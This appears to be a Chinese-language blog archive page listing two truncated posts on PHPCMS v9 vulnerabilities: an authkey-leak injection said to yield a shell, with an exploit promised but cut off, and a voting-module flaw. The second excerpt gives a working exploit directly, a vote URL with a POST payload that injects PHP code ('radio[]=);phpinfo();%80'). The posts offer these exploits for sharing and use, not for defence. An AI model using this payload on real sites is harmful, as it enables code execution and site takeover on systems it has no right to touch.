Menu

Phpcms

PHPCMS_V9之authkey注入漏洞
在乌云上的某一个漏洞 PHPCMS最新版本authkey泄露可注射拿shell 但是他没有给出利用的方法,如何利用authkey 我有朋友写出了该漏洞的exp 比较鸡肋,成功率不高,不过还是分享给大家。 利用方式 : 首先你得有php的环境并且启动curl_init()函数 php [...]
PHPCMS_v9之投票漏洞
废话不多说,直接上EXP EXP http://www.XXXXX.com.cn/index.php?m=vote&c=index&a=post&subjectid=1 post: subjectid=1&radio[]=);phpinfo();%80 或者 [...]